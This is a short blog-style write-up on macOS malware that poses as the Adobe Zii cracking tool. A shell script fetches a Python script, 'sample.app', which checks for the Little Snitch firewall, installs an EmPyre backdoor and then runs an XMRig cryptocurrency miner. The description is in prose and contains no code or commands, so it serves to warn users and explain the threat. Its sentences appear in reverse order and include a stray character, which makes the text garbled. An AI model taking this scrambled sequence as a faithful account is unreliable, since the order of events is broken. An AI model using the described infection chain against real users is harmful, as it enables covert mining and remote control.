Once the backdoor is opened, a command that downloads and runs XMRig miner is executed, however, this may not be the only problem you face.Īs mentioned, EmPyre performs many actions on the infected system. Injection of the EmPyre backdoor follows - this allows execution of various commands remotely. Therefore, this check is somewhat redundant. If present, Little Snitch would block the connection of the first shell script and the "sample.app" would not have been downloaded in the first place. If so, the script terminates itself and the infection stops. Firstly, it checks whether the Little Snitch application (firewall) is installed. Once excecuted, "sample.app" performs a number of actions. The Python script is named " sample.app" in an attempt to give the impression that it is the genuine Adobe Zii tool. Once opened, this malware executes a shell script designed to download another script written in the Python programming language. This malware claims to be Adobe Zii, a tool used to 'crack' Adobe software and bypass activation. Here, we look at malware that combines a backdoor-tool called EmPyre with XMRig and allows cyber criminals to exploit infected systems to mine cryptocurrency. Cyber criminals often misuse these tools to generate revenue in malicious ways. XMRig is a legitimate open-source application that allows utilization of system CPU resources to mine cryptocurrency.
0 Comments
Leave a Reply. |